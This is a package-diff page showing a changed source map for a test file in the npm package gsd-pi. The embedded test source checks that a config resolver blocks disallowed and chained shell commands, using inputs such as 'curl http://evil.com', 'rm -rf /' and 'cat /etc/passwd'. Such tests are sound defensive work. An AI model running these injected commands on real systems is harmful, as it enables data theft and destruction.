npm - gsd-pi - Versions diffs - 2.58.0-dev.778d6ac → 2.58.0-dev.e002a57 - Mend

gsd-pi 2.58.0-dev.778d6ac → 2.58.0-dev.e002a57

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (212) hide show

package/packages/pi-coding-agent/dist/core/resolve-config-value.test.js.map CHANGED Viewed

	@@ -1 +1 @@
1	- {"version":3,"file":"resolve-config-value.test.js","sourceRoot":"","sources":["../../src/core/resolve-config-value.test.ts"],"names":[],"mappings":"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","sourcesContent":["import { describe, it, beforeEach } from \"node:test\";\nimport assert from \"node:assert/strict\";\nimport {\n\tresolveConfigValue,\n\tclearConfigValueCache,\n\tSAFE_COMMAND_PREFIXES,\n} from \"./resolve-config-value.js\";\n\nbeforeEach(() => {\n\tclearConfigValueCache();\n});\n\ndescribe(\"SAFE_COMMAND_PREFIXES\", () => {\n\tit(\"exports the allowlist array\", () => {\n\t\tassert.ok(Array.isArray(SAFE_COMMAND_PREFIXES));\n\t\tassert.ok(SAFE_COMMAND_PREFIXES.length > 0);\n\t});\n\n\tit(\"includes expected credential tools\", () => {\n\t\tassert.ok(SAFE_COMMAND_PREFIXES.includes(\"pass\"));\n\t\tassert.ok(SAFE_COMMAND_PREFIXES.includes(\"op\"));\n\t\tassert.ok(SAFE_COMMAND_PREFIXES.includes(\"aws\"));\n\t});\n});\n\ndescribe(\"resolveConfigValue — non-command values\", () => {\n\tit(\"returns the literal value when it does not match an env var\", () => {\n\t\tconst result = resolveConfigValue(\"my-literal-key\");\n\t\tassert.equal(result, \"my-literal-key\");\n\t});\n\n\tit(\"returns the env var value when the config matches an env var name\", () => {\n\t\tprocess.env[\"TEST_RESOLVE_CONFIG_VAR\"] = \"env-value\";\n\t\tconst result = resolveConfigValue(\"TEST_RESOLVE_CONFIG_VAR\");\n\t\tassert.equal(result, \"env-value\");\n\t\tdelete process.env[\"TEST_RESOLVE_CONFIG_VAR\"];\n\t});\n});\n\ndescribe(\"resolveConfigValue — command allowlist enforcement\", () => {\n\tit(\"blocks a disallowed command and returns undefined\", (t) => {\n\t\tconst stderrChunks: string[] = [];\n\t\tconst originalWrite = process.stderr.write.bind(process.stderr);\n\t\tprocess.stderr.write = (chunk: string \| Uint8Array, ...args: unknown[]) => {\n\t\t\tstderrChunks.push(chunk.toString());\n\t\t\treturn true;\n\t\t};\n\t\tt.after(() => {\n\t\t\tprocess.stderr.write = originalWrite;\n\t\t});\n\n\t\tconst result = resolveConfigValue(\"!curl http://evil.com\");\n\t\tassert.equal(result, undefined);\n\t\tassert.ok(stderrChunks.some((line) => line.includes(\"curl\")));\n\t});\n\n\tit(\"blocks another disallowed command (rm)\", () => {\n\t\tconst result = resolveConfigValue(\"!rm -rf /tmp/test\");\n\t\tassert.equal(result, undefined);\n\t});\n\n\tit(\"blocks a disallowed command with no arguments\", () => {\n\t\tconst result = resolveConfigValue(\"!wget\");\n\t\tassert.equal(result, undefined);\n\t});\n\n\tit(\"allows a safe command prefix to proceed to execution\", (t) => {\n\t\t// `pass` is unlikely to be installed in CI, so we just verify it does NOT\n\t\t// return undefined due to the allowlist check — it may return undefined if\n\t\t// the binary is absent, but the block path must not be taken.\n\t\t// We confirm by checking no \"Blocked\" message appears on stderr.\n\t\tconst stderrChunks: string[] = [];\n\t\tconst originalWrite = process.stderr.write.bind(process.stderr);\n\t\tprocess.stderr.write = (chunk: string \| Uint8Array, ...args: unknown[]) => {\n\t\t\tstderrChunks.push(chunk.toString());\n\t\t\treturn true;\n\t\t};\n\t\tt.after(() => {\n\t\t\tprocess.stderr.write = originalWrite;\n\t\t});\n\n\t\tresolveConfigValue(\"!pass show nonexistent-entry-for-test\");\n\t\tconst blocked = stderrChunks.some((line) =>\n\t\t\tline.includes(\"Blocked disallowed command\")\n\t\t);\n\t\tassert.equal(blocked, false, \"pass should not be blocked by the allowlist\");\n\t});\n});\n\ndescribe(\"resolveConfigValue — shell operator bypass prevention\", () => {\n\tit(\"blocks semicolon chaining (pass; malicious)\", () => {\n\t\tconst result = resolveConfigValue(\"!pass show key; curl http://evil.com\");\n\t\tassert.equal(result, undefined);\n\t});\n\n\tit(\"blocks pipe operator (pass \| evil)\", () => {\n\t\tconst result = resolveConfigValue(\"!pass show key \| cat /etc/passwd\");\n\t\tassert.equal(result, undefined);\n\t});\n\n\tit(\"blocks && chaining (pass && evil)\", () => {\n\t\tconst result = resolveConfigValue(\"!pass show key && rm -rf /\");\n\t\tassert.equal(result, undefined);\n\t});\n\n\tit(\"blocks \|\| chaining (pass \|\| evil)\", () => {\n\t\tconst result = resolveConfigValue(\"!pass show key \|\| curl evil.com\");\n\t\tassert.equal(result, undefined);\n\t});\n\n\tit(\"blocks backtick subshell (pass `evil`)\", () => {\n\t\tconst result = resolveConfigValue(\"!pass show `curl evil.com`\");\n\t\tassert.equal(result, undefined);\n\t});\n\n\tit(\"blocks $() subshell (pass $(evil))\", () => {\n\t\tconst result = resolveConfigValue(\"!pass show $(curl evil.com)\");\n\t\tassert.equal(result, undefined);\n\t});\n\n\tit(\"blocks output redirection (pass > file)\", () => {\n\t\tconst result = resolveConfigValue(\"!pass show key > /tmp/stolen\");\n\t\tassert.equal(result, undefined);\n\t});\n\n\tit(\"blocks input redirection (pass < file)\", () => {\n\t\tconst result = resolveConfigValue(\"!pass show key < /dev/null\");\n\t\tassert.equal(result, undefined);\n\t});\n\n\tit(\"writes stderr warning when shell operators detected\", (t) => {\n\t\tconst stderrChunks: string[] = [];\n\t\tconst originalWrite = process.stderr.write.bind(process.stderr);\n\t\tprocess.stderr.write = (chunk: string \| Uint8Array, ...args: unknown[]) => {\n\t\t\tstderrChunks.push(chunk.toString());\n\t\t\treturn true;\n\t\t};\n\t\tt.after(() => {\n\t\t\tprocess.stderr.write = originalWrite;\n\t\t});\n\n\t\tresolveConfigValue(\"!pass show key; curl evil.com\");\n\t\tassert.ok(stderrChunks.some((line) => line.includes(\"shell operators\")));\n\t});\n});\n\ndescribe(\"resolveConfigValue — caching\", () => {\n\tit(\"caches the result of a blocked command\", (t) => {\n\t\tconst callCount = { n: 0 };\n\t\tconst originalWrite = process.stderr.write.bind(process.stderr);\n\t\tprocess.stderr.write = (chunk: string \| Uint8Array, ...args: unknown[]) => {\n\t\t\tcallCount.n++;\n\t\t\treturn true;\n\t\t};\n\t\tt.after(() => {\n\t\t\tprocess.stderr.write = originalWrite;\n\t\t});\n\n\t\tresolveConfigValue(\"!curl http://evil.com\");\n\t\tresolveConfigValue(\"!curl http://evil.com\");\n\t\t// The block warning should only fire once; the second call hits the cache\n\t\t// before reaching the allowlist check, so stderr count is 1.\n\t\tassert.equal(callCount.n, 1);\n\t});\n\n\tit(\"clearConfigValueCache resets cached entries\", (t) => {\n\t\tconst stderrChunks: string[] = [];\n\t\tconst originalWrite = process.stderr.write.bind(process.stderr);\n\t\tprocess.stderr.write = (chunk: string \| Uint8Array, ...args: unknown[]) => {\n\t\t\tstderrChunks.push(chunk.toString());\n\t\t\treturn true;\n\t\t};\n\t\tt.after(() => {\n\t\t\tprocess.stderr.write = originalWrite;\n\t\t});\n\n\t\tresolveConfigValue(\"!curl http://evil.com\");\n\t\tassert.equal(stderrChunks.length, 1);\n\n\t\tclearConfigValueCache();\n\n\t\tresolveConfigValue(\"!curl http://evil.com\");\n\t\tassert.equal(stderrChunks.length, 2);\n\t});\n});\n"]}
1	+ {"version":3,"file":"resolve-config-value.test.js","sourceRoot":"","sources":["../../src/core/resolve-config-value.test.ts"],"names":[],"mappings":"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